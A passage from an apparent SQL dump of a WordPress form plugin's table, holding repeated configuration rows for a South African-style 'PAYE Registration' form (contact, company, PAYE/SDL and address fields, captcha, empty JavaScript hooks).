like to register for both PAYE and SDL?%</div><div wdid=\"21\" class=\"wdform_row ui-sortable-handle\">%21 - SDL Liability Date%</div><div wdid=\"25\" class=\"wdform_row ui-sortable-handle\">%25 - Word Verification:%</div><div wdid=\"26\" class=\"wdform_row ui-sortable-handle\">%26 - type_submit_reset_26%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - Address:%</div><div wdid=\"14\" class=\"wdform_row ui-sortable-handle\">%14 - Postal Address%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',27,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Phone:#**label**#type_phone#****#16#**id**#Cell Number#**label**#type_text#****#17#**id**#Fax Number#**label**#type_text#****#5#**id**#Company Name#**label**#type_text#****#6#**id**#Company Registration Number#**label**#type_text#****#22#**id**#Would you like to register for PAYE only?#**label**#type_radio#****#20#**id**#PAYE Liability Date#**label**#type_text#****#23#**id**#Would you like to register for both PAYE and SDL?#**label**#type_radio#****#21#**id**#SDL Liability Date#**label**#type_text#****#25#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#26#**id**#type_submit_reset_26#**label**#type_submit_reset#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Postal Address#**label**#type_text#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Phone:#**label**#type_phone#****#16#**id**#Cell Number#**label**#type_text#****#17#**id**#Fax Number#**label**#type_text#****#5#**id**#Company Name#**label**#type_text#****#6#**id**#Company Registration Number#**label**#type_text#****#22#**id**#Would you like to register for PAYE only?#**label**#type_radio#****#20#**id**#PAYE Liability Date#**label**#type_text#****#23#**id**#Would you like to register for both PAYE and SDL?#**label**#type_radio#****#21#**id**#SDL Liability Date#**label**#type_text#****#25#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#26#**id**#type_submit_reset_26#**label**#type_submit_reset#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Postal Address#**label**#type_text#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*3*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*16*:*id*:*type_text*:*type*:*Cell Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*17*:*id*:*type_text*:*type*:*Fax Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_section_break*:*type*:*custom_4*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*5*:*id*:*type_text*:*type*:*Company Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_text*:*type*:*Company Registration Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*22*:*id*:*type_radio*:*type*:*Would you like to register for PAYE only?*:*w_field_label*:*300*:*w_field_label_size*:*top*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*20*:*id*:*type_text*:*type*:*PAYE Liability Date*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*23*:*id*:*type_radio*:*type*:*Would you like to register for both PAYE and SDL?*:*w_field_label*:*400*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*21*:*id*:*type_text*:*type*:*SDL Liability Date*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*25*:*id*:*type_arithmetic_captcha*:*type*:*Word Verification:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yes*:*w_hide_label*:*2*:*w_count*:*+, -,*:*w_operations*:**:*w_class*:*60*:*w_input_size*:**:*new_field*:*26*:*id*:*type_submit_reset*:*type*:*type_submit_reset_26*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*8*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*14*:*id*:*type_text*:*type*:*Postal Address*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'PAYE Registration','','','none',0),(66,0,16,'PAYE Registration','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail:%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Phone:%</div><div wdid=\"16\" class=\"wdform_row ui-sortable-handle\">%16 - Cell Number%</div><div wdid=\"17\" class=\"wdform_row ui-sortable-handle\">%17 - Fax Number%</div></div></div><div wdid=\"4\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%4 - custom_4%</div><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Company Name%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Company Registration Number%</div><div wdid=\"22\" class=\"wdform_row ui-sortable-handle\">%22 - Would you like to register for PAYE only?%</div><div wdid=\"20\" class=\"wdform_row ui-sortable-handle\">%20 - PAYE Liability Date%</div><div wdid=\"23\" class=\"wdform_row ui-sortable-handle\">%23 - Would you like to register for both PAYE and SDL?%</div><div wdid=\"21\" class=\"wdform_row ui-sortable-handle\">%21 - SDL Liability Date%</div><div wdid=\"25\" class=\"wdform_row ui-sortable-handle\">%25 - Word Verification:%</div><div wdid=\"26\" class=\"wdform_row ui-sortable-handle\">%26 - type_submit_reset_26%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - Address:%</div><div wdid=\"14\" class=\"wdform_row ui-sortable-handle\">%14 - Postal Address%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',27,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Phone:#**label**#type_phone#****#16#**id**#Cell Number#**label**#type_text#****#17#**id**#Fax Number#**label**#type_text#****#5#**id**#Company Name#**label**#type_text#****#6#**id**#Company Registration Number#**label**#type_text#****#22#**id**#Would you like to register for PAYE only?#**label**#type_radio#****#20#**id**#PAYE Liability Date#**label**#type_text#****#23#**id**#Would you like to register for both PAYE and SDL?#**label**#type_radio#****#21#**id**#SDL Liability Date#**label**#type_text#****#25#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#26#**id**#type_submit_reset_26#**label**#type_submit_reset#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Postal Address#**label**#type_text#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Phone:#**label**#type_phone#****#16#**id**#Cell Number#**label**#type_text#****#17#**id**#Fax Number#**label**#type_text#****#5#**id**#Company Name#**label**#type_text#****#6#**id**#Company Registration Number#**label**#type_text#****#22#**id**#Would you like to register for PAYE only?#**label**#type_radio#****#20#**id**#PAYE Liability Date#**label**#type_text#****#23#**id**#Would you like to register for both PAYE and SDL?#**label**#type_radio#****#21#**id**#SDL Liability Date#**label**#type_text#****#25#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#26#**id**#type_submit_reset_26#**label**#type_submit_reset#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Postal Address#**label**#type_text#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*3*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*16*:*id*:*type_text*:*type*:*Cell Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*17*:*id*:*type_text*:*type*:*Fax Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_section_break*:*type*:*custom_4*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*5*:*id*:*type_text*:*type*:*Company Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_text*:*type*:*Company Registration Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*22*:*id*:*type_radio*:*type*:*Would you like to register for PAYE only?*:*w_field_label*:*300*:*w_field_label_size*:*top*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*20*:*id*:*type_text*:*type*:*PAYE Liability Date*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*23*:*id*:*type_radio*:*type*:*Would you like to register for both PAYE and SDL?*:*w_field_label*:*400*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*21*:*id*:*type_text*:*type*:*SDL Liability Date*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*25*:*id*:*type_arithmetic_captcha*:*type*:*Word Verification:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yes*:*w_hide_label*:*2*:*w_count*:*+, -,*:*w_operations*:**:*w_class*:*60*:*w_input_size*:**:*new_field*:*26*:*id*:*type_submit_reset*:*type*:*type_submit_reset_26*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*8*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yes*:*w_hide_label*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*14*:*id*:*type_text*:*type*:*Postal Address*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'PAYE Registration','','','none',0),(67,0,16,'PAYE Registration','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail:%</div><div wdid=\"16\" class=\"wdform_row ui-sortable-handle\">%16 - Cell Number%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Phone:%</div><div wdid=\"17\" class=\"wdform_row ui-sortable-handle\">%17 - Fax Number%</div></div></div><div wdid=\"4\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%4 - custom_4%</div><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Company Name%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Company Registration Number%</div><div wdid=\"22\" class=\"wdform_row ui-sortable-handle\">%22 - Would you like to register for PAYE only?%</div><div wdid=\"20\" class=\"wdform_row ui-sortable-handle\">%20 - PAYE Liability Date%</div><div wdid=\"23\" class=\"wdform_row ui-sortable-handle\">%23 - Would you like to register for both PAYE and SDL?%</div><div wdid=\"21\" class=\"wdform_row ui-sortable-handle\">%21 - SDL Liability Date%</div><div wdid=\"25\" class=\"wdform_row ui-sortable-handle\">%25 - Word Verification:%</div><div wdid=\"26\" class=\"wdform_row ui-sortable-handle\">%26 - type_submit_reset_26%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - Address:%</div><div wdid=\"14\" class=\"wdform_row ui-sortable-handle\">%14 - Postal Address%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',27,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#16#**id**#Cell Number#**label**#type_text#****#3#**id**#Phone:#**label**#type_phone#****#17#**id**#Fax Number#**label**#type_text#****#5#**id**#Company Name#**label**#type_text#****#6#**id**#Company Registration Number#**label**#type_text#****#22#**id**#Would you like to register for PAYE only?#**label**#type_radio#****#20#**id**#PAYE Liability Date#**label**#type_text#****#23#**id**#Would you like to register for both PAYE and SDL?#**label**#type_radio#****#21#**id**#SDL Liability Date#**label**#type_text#****#25#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#26#**id**#type_submit_reset_26#**label**#type_submit_reset#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Postal Address#**label**#type_text#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#16#**id**#Cell Number#**label**#type_text#****#3#**id**#Phone:#**label**#type_phone#****#17#**id**#Fax Number#**label**#type_text#****#5#**id**#Company Name#**label**#type_text#****#6#**id**#Company Registration Number#**label**#type_text#****#22#**id**#Would you like to register for PAYE only?#**label**#type_radio#****#20#**id**#PAYE Liability Date#**label**#type_text#****#23#**id**#Would you like to register for both PAYE and SDL?#**label**#type_radio#****#21#**id**#SDL Liability Date#**label**#type_text#****#25#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#26#**id**#type_submit_reset_26#**label**#type_submit_reset#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Postal Address#**label**#type_text#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*16*:*id*:*type_text*:*type*:*Cell Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*17*:*id*:*type_text*:*type*:*Fax Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_section_break*:*type*:*custom_4*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*5*:*id*:*type_text*:*type*:*Company Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_text*:*type*:*Company Registration Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*22*:*id*:*type_radio*:*type*:*Would you like to register for PAYE only?*:*w_field_label*:*300*:*w_field_label_size*:*top*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*20*:*id*:*type_text*:*type*:*PAYE Liability Date*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*23*:*id*:*type_radio*:*type*:*Would you like to register for both PAYE and 